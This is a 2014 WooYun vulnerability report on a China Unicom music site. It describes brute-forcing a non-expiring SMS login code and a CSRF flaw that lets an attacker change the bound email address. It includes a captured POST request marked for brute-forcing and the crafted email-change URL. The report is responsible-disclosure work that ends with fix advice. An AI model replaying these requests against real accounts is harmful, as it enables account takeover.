当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-055777

漏洞标题:联通某音乐分站重置任意账户漏洞(两处)

相关厂商:中国联通

漏洞作者: Comer

提交时间:2014-04-06 21:21

修复时间:2014-05-21 21:21

公开时间:2014-05-21 21:21

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-04-06: 细节已通知厂商并且等待厂商处理中
2014-04-11: 厂商已经确认,细节仅向厂商公开
2014-04-21: 细节向核心白帽子及相关领域专家公开
2014-05-01: 细节向普通白帽子公开
2014-05-11: 细节向实习白帽子公开
2014-05-21: 细节向公众公开

简要描述:

Free - Sarah Brightman,我来了...

详细说明:

登陆前是一处。另一处在修改绑定邮箱。

#1  手机登陆六位短信验证存在爆破风险。


60秒失效这功能没实现~

#0.png

填完要重置的手机号,确认并截获请求

POST /wouser/loginByMsisdn.jspx HTTP/1.1
Host: ah.10155.com
Proxy-Connection: keep-alive
Content-Length: 38
Accept: */*
Origin: http://ah.10155.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://ah.10155.com/wouser/toLogin.jspx?gateType=userLogin
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,ja;q=0.4
Cookie: _provId=36; H3C-SrvID=f0e10019; JSESSIONID=B1307F67EBE4467E95A20CD68347A681; _provId=36
msisdn=13**我叫马赛克**8&smscheckcode=§123456§

对smscheckcode实施爆破。
以便于测试,我这里只对554100 - 554600之间验证code做尝试。

#1.png

成功请求的字节长度跟其他不一致(很多真实战况里爆破条数较多,可以事先测试看成功时返回的关键字是什么,然后做 filter, 比如此时的 success)。这里做证明就不过滤了。

#2.png

这里比较有意识的是,当成功时后端直接颁发session信息过来,这边刷新页面就是登陆状态了。

#5.png


其中wap站登陆包括后续购买彩铃这些操作都需要这个短信验证

#6.png


爆破这块只针对绑定手机的用户,绑定邮箱的怎么办呢?

#2  CSRF之重置任意账户


说起CSRF,就有局限性了,毕竟面对的是登陆用户。是。不过这个不用构造表单这些只许一个URL即可。
修改绑定邮箱处,无任何前置的验证,直接可修改

#3.png

看了下之后的请求

http://ah.10155.com/wouserCenter/userSafe_changeEmail.jspx?method=bind&email=**马赛克**@yeah.net&_=1396778028418

email就是要修改的邮箱,类似unix时间戳的 _ 参数真身是验证码一个 rondom 值,找一加载验证码的地儿重新获取即可。
测试方法:登陆状态的A访问b所构造的URL。
找了一圈儿只在一个response中发现有展示邮箱的地儿,但也看不到用户名(PS还是不要了,完全不会...)。所以邮箱这块就不截图了。
只上一张后续重置成功的图

#4.png

顺便说下拿邮箱来找回密码,确认邮件中的密码是明文的。

漏洞证明:

见上

修复方案:

各敏感的接口得做好验证啊。有交互性的操作附加Token令牌啊。

版权声明:转载请注明来源 Comer@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-04-11 14:13

厂商回复:

已经转由CNCERT下发给安徽分中心处置。

最新状态:

暂无